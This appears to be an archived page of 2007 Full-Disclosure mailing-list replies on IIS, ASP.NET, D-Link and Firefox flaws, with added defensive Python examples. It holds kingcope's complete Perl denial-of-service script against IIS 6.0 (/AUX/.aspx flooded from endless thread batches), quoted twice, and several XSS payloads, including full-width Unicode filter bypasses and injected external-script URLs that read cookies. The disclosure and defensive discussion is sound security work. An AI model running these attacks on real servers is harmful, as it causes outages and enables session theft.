k>> my $host = $ARGV[0];

k>> $|=1;

k>> # One request per thread. The response is never read; the socket is simply
k>> # dropped when the thread exits.
k>> sub sendit {
k>>     my $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                                      PeerPort => 'http(80)',
k>>                                      Proto    => 'tcp') or return;
k>>     print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n";
k>> }

k>> # Probe once and look for the ASP.NET runtime error in the response.
k>> my $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>                                  PeerPort => 'http(80)',
k>>                                  Proto    => 'tcp') or die "connect: $!";

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n";

k>> my $k=0;
k>> while (<$sock>) {
k>>     if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>>         $k=1;
k>>         last;
k>>     }
k>> }

k>> if ($k==0) {
k>>     print "Server does not seem vulnerable to this attack.\n";
k>>     exit;
k>> }

k>> print "ATTACK!\n";

k>> # Fire requests in batches of 100 threads, forever.
k>> while(1){
k>>     for (my $i=0;$i<=100;$i++) {
k>>         my $thr = threads->new(\&sendit);
k>>         print "\r$i/100";
k>>     }
k>>     foreach my $thr (threads->list) {
k>>         $thr->join;
k>>     }
k>> }






-- 
~/ZARAZA http://securityvulns.com/
Thus he dies for the sixth time, and again in a new place. (Twain)


Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

2007-05-23 Thread 3APA3A
Dear kingcope,

It's a vulnerability regardless of the DoS impact, because it allows an
attacker to access special DOS devices (COM1 in this case). E.g. it could
be used to read data from a device attached to COM1 or to prevent another
application from accessing this port (or LPT), because access to ports is
exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond than
k> normally. So I did write an automated script to see what happens if
k> I request this file several times at once. The result is that some servers
k> on the internet get quite unstable, some do not. On some servers after I
k> stop the attack I get an exception that the Server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> # When sending multiple parallel GET requests to a IIS 6.0 server requesting
k> # /AUX/.aspx the server gets unstable and non-responsive. This happens only
k> # to servers which respond with a runtime error (System.Web.HttpException)
k> # and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> # signed,
k> # Kingcope [EMAIL PROTECTED]
k> ##########################################################################
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k> ##########################################################################

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> # One request per thread. The response is never read; the socket is simply
k> # dropped when the thread exits.
k> sub sendit {
k>     my $sock = IO::Socket::INET->new(PeerAddr => $host,
k>                                      PeerPort => 'http(80)',
k>                                      Proto    => 'tcp') or return;
k>     print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n";
k> }

k> # Probe once and look for the ASP.NET runtime error in the response.
k> my $sock = IO::Socket::INET->new(PeerAddr => $host,
k>                                  PeerPort => 'http(80)',
k>                                  Proto    => 'tcp') or die "connect: $!";

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost: $host\r\nConnection: close\r\n\r\n";

k> my $k=0;
k> while (<$sock>) {
k>     if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>         $k=1;
k>         last;
k>     }
k> }

k> if ($k==0) {
k>     print "Server does not seem vulnerable to this attack.\n";
k>     exit;
k> }

k> print "ATTACK!\n";

k> # Fire requests in batches of 100 threads, forever.
k> while(1){
k>     for (my $i=0;$i<=100;$i++) {
k>         my $thr = threads->new(\&sendit);
k>         print "\r$i/100";
k>     }
k>     foreach my $thr (threads->list) {
k>         $thr->join;
k>     }
k> }




-- 
~/ZARAZA http://securityvulns.com/
For facts are facts, and they are set forth only so that they may be
understood and believed. (Twain)

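Added example (not IIS or ASP.NET code; a re-implementation written for this page) of the check kingcope describes in the thread above: a validator that looks only at the final file name blocks /AUX.aspx but lets /AUX/.aspx through, because ".aspx" has no stem and the AUX directory component is never examined, while one that tests every decoded path component catches both. The RESERVED set is the classic Win32 list; the stem rule (trailing dots and spaces dropped, everything from the first '.' or ':' ignored) is the classic Win32 behaviour and is assumed here.

```python
from urllib.parse import unquote

# Classic Win32 reserved device names. A path component whose base name
# matches one of these (before any extension, ignoring trailing dots and
# spaces) is opened as the device \\.\NAME, whatever directory it sits in.
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {"COM%d" % i for i in range(1, 10)}
            | {"LPT%d" % i for i in range(1, 10)})


def device_stem(component: str) -> str:
    """Base name as the Win32 path parser sees it: trailing dots and spaces
    are dropped, anything from the first '.' or ':' onwards is ignored."""
    base = component.rstrip(". ")
    for sep in (".", ":"):
        base = base.split(sep, 1)[0]
    return base.upper()


def naive_check_blocks(url_path: str) -> bool:
    """The check kingcope describes: only the last component is examined.
    /AUX.aspx is caught, /AUX/.aspx is not, because ".aspx" has an empty
    stem and the AUX directory component is never looked at."""
    filename = url_path.rsplit("/", 1)[-1]
    return device_stem(filename) in RESERVED


def segment_check_blocks(url_path: str) -> bool:
    """Percent-decode, treat backslash as a separator as Windows does, and
    test every component of the path, not just the last one."""
    decoded = unquote(url_path).replace("\\", "/")
    return any(device_stem(seg) in RESERVED for seg in decoded.split("/") if seg)


if __name__ == "__main__":
    for p in ("/AUX.aspx", "/AUX/.aspx", "/%41UX/.aspx", "/images/com1.gif"):
        print("%-20s naive=%-5s per-segment=%s"
              % (p, naive_check_blocks(p), segment_check_blocks(p)))
```

Run the per-segment check on the decoded, separator-normalised path before the request reaches anything that will touch the file system with it; a device name anywhere in the path is reason enough to reject the request outright.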

[Full-disclosure] Unicode Left/Right Pointing Double Angle Quotation Mark bypass?

2007-05-22 Thread 3APA3A
Dear full-disclosure@lists.grok.org.uk,

  By the way: I saw the Unicode Left-Pointing Double Angle Quotation Mark
  (%u00AB) / Unicode Right-Pointing Double Angle Quotation Mark (%u00BB)
  are sometimes translated to '<' and '>'. Has somebody experimented with

  %u00ABscript%u00BB

  in different environments to bypass filtering in this way?

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/



Re: [Full-disclosure] noise about full-width encoding bypass?

2007-05-22 Thread 3APA3A
Dear Brian Eaton,

--Monday, May 21, 2007, 11:28:27 PM, you wrote to [EMAIL PROTECTED]:


BE> Given how few application platforms decode full-width unicode to ASCII
BE> equivalents, is there a case to be made that those application
BE> platforms that do decide this conversion is a good idea are broken?

BE> Put another way: should this be considered a bug in ASP.NET?

BE> Regards,
BE> Brian

Converting e.g. Unicode full-width 'A' into ASCII 'A' is definitely valid
and expected behavior. The bug is using unfiltered input in HTML/SQL
generation. As for the inability of a content filter to catch this
situation, it's just one more way to bypass it. See

http://securityvulns.com/advisories/content.asp
http://securityvulns.com/advisories/bypassing.asp


-- 
~/ZARAZA http://securityvulns.com/
So, I will be brief. (Twain)


Re: [Full-disclosure] noise about full-width encoding bypass?

2007-05-22 Thread 3APA3A
Dear Brian Eaton,

--Monday, May 21, 2007, 11:48:09 PM, you wrote to [EMAIL PROTECTED]:

BE> On 5/21/07, 3APA3A <[EMAIL PROTECTED]> wrote:
>> It's not true, because it's quite convertible character. At least for IIS:
>>
>> http://example.com/test.asp?q=%uFF1Cscript>alert("Hello")
>>
>> where test.asp is
>>
>> <%=Request.QueryString("q")%>
>>
>> launches javascript.

BE> This does not work for me for IIS 6 and IE 7.  What platform did you test?

Windows 2003 Server Std. Russian + all updates. It may actually depend
on the default server language/charset, because the text is actually
converted to the ANSI charset, not to ASCII. Mine is Windows-1251.


BE> Regards,
BE> Brian

-- 
~/ZARAZA http://securityvulns.com/




Re: [Full-disclosure] noise about full-width encoding bypass?

2007-05-21 Thread 3APA3A
Dear Brian Eaton,

--Monday, May 21, 2007, 6:22:21 PM, you wrote to [EMAIL PROTECTED]:


BE> If the SQL engine is processing queries in ASCII or ISO-8859-1, the
BE> conversion from unicode to the code page used by the engine will fail.
BE>  Either the engine will give up on the query, or it might substitute a
BE> question mark (?) for the unconvertible character.

It's not true, because it's quite a convertible character. At least for IIS:

http://example.com/test.asp?q=%uFF1Cscript>alert("Hello")

where test.asp is

<%=Request.QueryString("q")%>

launches javascript.

BTW: it may be used to bypass keyword-based filtering to create, e.g.,
porn pages available through any corporate firewall. See

http://securityvulns.ru/files/p.html

-- 
~/ZARAZA http://securityvulns.com/


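Added example (written for this page, not IIS or ASP code) of the full-width bypass discussed in the three messages above and of the ordering bug behind it. decode_query_value re-implements the %uXXXX escape that the test.asp example relies on; to_ansi stands in for the server's Unicode-to-ANSI conversion using NFKC, which is an approximation, since the real best-fit mapping is code-page dependent as noted in the reply about Windows-1251; and the two render functions show that HTML-escaping before that conversion is useless while escaping after it is safe. The payloads are constructed for the demo.

```python
import html
import re
import unicodedata
from urllib.parse import unquote

_U_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def decode_query_value(value: str) -> str:
    """Expand the non-standard %uXXXX escapes that IIS/ASP accept (this is a
    re-implementation written for the example, not the server's code), then
    the ordinary %XX escapes."""
    value = _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)
    return unquote(value)


def to_ansi(text: str) -> str:
    """Stand-in for the server's Unicode-to-ANSI conversion. Windows best-fit
    mapping is code-page dependent; NFKC is used here because it performs
    the same fold for the full-width forms (U+FF1C -> '<', U+FF21 -> 'A')
    and needs no Windows API. Treat it as an approximation."""
    return unicodedata.normalize("NFKC", text)


def naive_filter_blocks(text: str) -> bool:
    """Blacklist applied to the decoded, not-yet-converted string."""
    return "<script" in text.lower()


def render_escape_then_convert(value: str) -> str:
    """Wrong order: escape the Unicode string, then let the page's charset
    conversion run. The full-width bracket survives escaping and is folded
    into a real '<' afterwards."""
    return to_ansi(html.escape(decode_query_value(value), quote=True))


def render_convert_then_escape(value: str) -> str:
    """Right order: convert to the output charset first, then HTML-escape
    what will actually be emitted."""
    return html.escape(to_ansi(decode_query_value(value)), quote=True)


if __name__ == "__main__":
    payload = "%uFF1Cscript%uFF1Ealert(1)%uFF1C/script%uFF1E"   # constructed
    decoded = decode_query_value(payload)
    print("decoded:         ", decoded, "blocked:", naive_filter_blocks(decoded))
    print("after ANSI fold: ", to_ansi(decoded))
    print("escape, convert: ", render_escape_then_convert(payload))
    print("convert, escape: ", render_convert_then_escape(payload))
```

This is the concrete form of the remark that the bug is using unfiltered input in HTML generation: a keyword filter on the wrong representation proves nothing, and even correct escaping is defeated if a charset conversion runs after it.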


Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

2007-05-16 Thread 3APA3A
Dear Davide Del Vecchio,

 It's also possible to recover deleted photos from almost any flash card
 in almost any device (camera, mobile, etc): it's the way general-purpose
 file systems work. The requirement to delete information securely is
 enforced in devices certified to, e.g., process US military secrets. In
 this case, the device must follow DoD 5220.22-M recommendations and you
 can expect secure erase. In general-purpose operating systems and
 devices, to delete information securely (wipe it) some additional
 actions/utilities are usually required.

--Tuesday, May 15, 2007, 9:09:19 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

DDV> Hello list,

DDV> During some research, I found an interesting "feature"
DDV> on my Nokia mobile phone; I was able to retrieve any
DDV> apparently deleted sms/mms.


-- 
~/ZARAZA http://securityvulns.com/



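As an added illustration of the point in the message above (not code from the message, from Nokia or from any recovery tool), here is a toy Python model of a flash card: an ordinary delete drops only the directory entry, so a signature carver scanning the raw medium still recovers the "deleted" photo, while a wipe that overwrites the blocks first defeats the carver. The card class, its bump allocator, the JPEG stand-in and the wipe pattern are all constructed for this example.

```python
"""Added example (not from the original message): why 'deleted' files on a
flash card remain recoverable, and what a wipe changes."""
from __future__ import annotations

JPEG_SOI = b"\xff\xd8\xff"   # JPEG start-of-image marker
JPEG_EOI = b"\xff\xd9"       # JPEG end-of-image marker


class ToyFlashCard:
    """Raw medium (bytearray) plus a directory: name -> (offset, length).
    A bump allocator stands in for the file system's block allocation."""

    def __init__(self, size: int = 4096):
        self.media = bytearray(size)
        self.directory: dict[str, tuple[int, int]] = {}
        self._next_free = 0

    def write(self, name: str, data: bytes) -> None:
        if self._next_free + len(data) > len(self.media):
            raise OSError("medium full")
        offset = self._next_free
        self.media[offset:offset + len(data)] = data
        self.directory[name] = (offset, len(data))
        self._next_free += len(data)

    def delete(self, name: str) -> None:
        """Ordinary delete: forget the metadata, leave the bytes in place."""
        del self.directory[name]

    def wipe(self, name: str, passes=(b"\x00", b"\xff", b"\x00")) -> None:
        """Secure delete: overwrite the blocks before removing the entry.
        Simplified fixed patterns; real wipe standards define their own
        pass patterns and a verification step."""
        offset, length = self.directory[name]
        for pattern in passes:
            self.media[offset:offset + length] = pattern * length
        del self.directory[name]


def carve_jpegs(media: bytes) -> list[bytes]:
    """Signature carving: recover every SOI..EOI span from the raw medium,
    ignoring the directory entirely (this is what recovery tools do)."""
    found, pos = [], 0
    while True:
        start = media.find(JPEG_SOI, pos)
        if start < 0:
            return found
        end = media.find(JPEG_EOI, start + len(JPEG_SOI))
        if end < 0:
            return found
        found.append(bytes(media[start:end + len(JPEG_EOI)]))
        pos = end + len(JPEG_EOI)


# Constructed stand-in for a photo: valid markers around filler bytes.
SAMPLE_PHOTO = JPEG_SOI + b"\xe0JFIF" + b"\x01" * 64 + JPEG_EOI


def demo() -> tuple[bool, bool]:
    """Returns (recoverable after ordinary delete, recoverable after wipe)."""
    card = ToyFlashCard()
    card.write("IMG_0001.JPG", SAMPLE_PHOTO)
    card.delete("IMG_0001.JPG")
    after_delete = carve_jpegs(card.media) == [SAMPLE_PHOTO]

    card = ToyFlashCard()
    card.write("IMG_0002.JPG", SAMPLE_PHOTO)
    card.wipe("IMG_0002.JPG")
    after_wipe = carve_jpegs(card.media) == [SAMPLE_PHOTO]
    return after_delete, after_wipe


if __name__ == "__main__":
    print("recoverable after delete, after wipe:", demo())
```

Real media add a complication the toy omits: flash translation layers remap writes, so an overwrite may land on a different physical block while the old one stays readable to a chip-level reader, which is why certified devices rely on controller-level secure erase rather than file-level overwriting alone.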

Re: [Full-disclosure] Medium security hole affecting DSL-G624T

2007-05-03 Thread 3APA3A
Dear Tim Brown,



--Friday, May 4, 2007, 1:50:40 AM, you wrote to [EMAIL PROTECTED]:

TB> On Thursday 03 May 2007 22:13:15 3APA3A wrote:

>> This  vulnerability  for  D-Link  DSL-G624T was already reported by Jose
>> Ramon Palanco. See
>>
>> http://securityvulns.ru/Odocument816.html
>>

TB> However, as I also point out in the Solutions section, all of the issues
TB> you list were against major version 1 of the firmware.  We're now at major
TB> version 3 and directory traversal is still a problem.

Not exactly, read the first link carefully:

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616

Discovered by:

Jose Ramon Palanco: jose.palanco(at)eazel(dot).es

This firmware date is even newer than yours :)

TB> Secondly, the Javascript injection issue described is as far as I
TB> know /entirely new/.  It's not a short walk to the point where these two
TB> issues alone could be used to compromise devices, irrespective of the
TB> firmware issues you also link to.

Jose mentions both directory traversal and 3 examples of cross-site
scripting. Cross-site scripting examples are different from yours though
and require a POST request. Your CSS is easier to exploit.

TB> Maybe, I'm hoping that by version 10 of the firmware in the year 2014,
TB> D-Link may actually manage to fix some of these reported problems?  Moreover,
TB> maybe they'll actually make it possible for researchers to report these
TB> things in a manner whereby they actually respond to the reports when
TB> contacted.  Not holding my breath though.

In fact, at least Russian D-Link support is very responsive to any bug
report, but it seems like the only way to get a response is to post a
problem on their forum.

-- 
~/ZARAZA http://securityvulns.com/



Re: [Full-disclosure] Medium security hole affecting DSL-G624T

2007-05-03 Thread 3APA3A
Dear Tim Brown,

This vulnerability for D-Link DSL-G624T was already reported by Jose
Ramon Palanco. See

http://securityvulns.ru/Odocument816.html

Previously, the same problem was reported for D-Link DSL-G604T by Qex

http://securityvulns.ru/Mdocument578.html


There were also a few more problems reported about /cgi-bin/webcm, see

http://securityvulns.ru/Idocument664.html
http://securityvulns.ru/Idocument759.html



--Thursday, May 3, 2007, 2:43:58 AM, you wrote to [EMAIL PROTECTED]:

TB> Hi,

TB> I've identified a couple of security flaws affecting the DSL-G624T firmware.
TB> I believe the directory traversal issue has been reported in other devices /
TB> firmware versions supplied by D-Link but not the combination I tested and
TB> clearly has not been resolved.  Additionally, the Javascript injection issue
TB> is I believe new and has not been reported on any device.

TB> These issues were reported by email to the vendor at the usual addresses
TB> (support/security/etc) without response on 13th April 2007.  I also
TB> attempted to log faults on the vendor's support web site but sadly, it
TB> would not function adequately using either Firefox or Konqueror.

TB> Tim


-- 
~/ZARAZA http://securityvulns.com/
Even if you do receive some letter, you still won't be able to read it. (Twain)


Re: [Full-disclosure] Firefox 2.0.0.3 Phishing Protection Bypass Vulnerability

2007-04-18 Thread 3APA3A
Dear carl hardwick,

 Do you know examples of phishing sites exploiting this vulnerability?

--Wednesday, April 18, 2007, 1:47:03 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

ch> This flaw
ch> http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php
ch> remains unpatched for months!!!
ch> Firefox 2.0.0.1, 2.0.0.2, 2.0.0.3 are still vulnerable!
ch> https://bugzilla.mozilla.org/show_bug.cgi?id=367538


-- 
~/ZARAZA http://securityvulns.com/



Re: [Full-disclosure] Internet Explorer Crash

2007-04-17 Thread 3APA3A
Dear carl hardwick,

Both Firefox 2.0.0.3 and IE 6.0.2900.2180 resisted (Firefox stops
loading the page after 500MB of memory, IE warns about the script slowing down
performance). It's a simple memory bomb; probably you are vulnerable
because you have <= 512 MB of RAM.

--Tuesday, April 17, 2007, 10:56:14 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

ch> Mozilla Firefox 2.0.0.3 is also vulnerable


-- 
~/ZARAZA http://securityvulns.com/



Re: [Full-disclosure] Mozilla Firefox Insecure Element Stealth Injection Vulnerability

2007-04-04 Thread 3APA3A
Dear Michal Majchrowicz,

 This feature is not intended to protect against XSS, it's only intended
 to inform you that some information is transmitted in cleartext. You can
 simply change

 src="http://server2.com/xss.js

 to

 src="https://server2.com/xss.js

 to avoid this message.

--Wednesday, April 4, 2007, 3:29:14 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

MM> When a user visits sites over the HTTPS protocol he is informed by the Web
MM> Browser every time the site tries to load an unsecured (using HTTP
MM> protocol) element (script/iframe/object etc.).
MM> So for instance if we have an XSS vulnerable site
MM> https://server.com/vuln.php?id=";>alert(document.cookie);
MM> Every browser will execute it without any complaints since they cannot
MM> know where the code comes from. But this example will cause a warning:
MM> https://server.com/vuln.php?id=";> src="http://server2.com/xss.js";>
MM> Web Browser knows that we are trying to load something over an insecure
MM> protocol.
MM> However Mozilla Firefox will fail with the following example and the
MM> user will think that all the elements are "safe":
MM> https://server.com/vuln.php?id=";>setTimeout("document.write('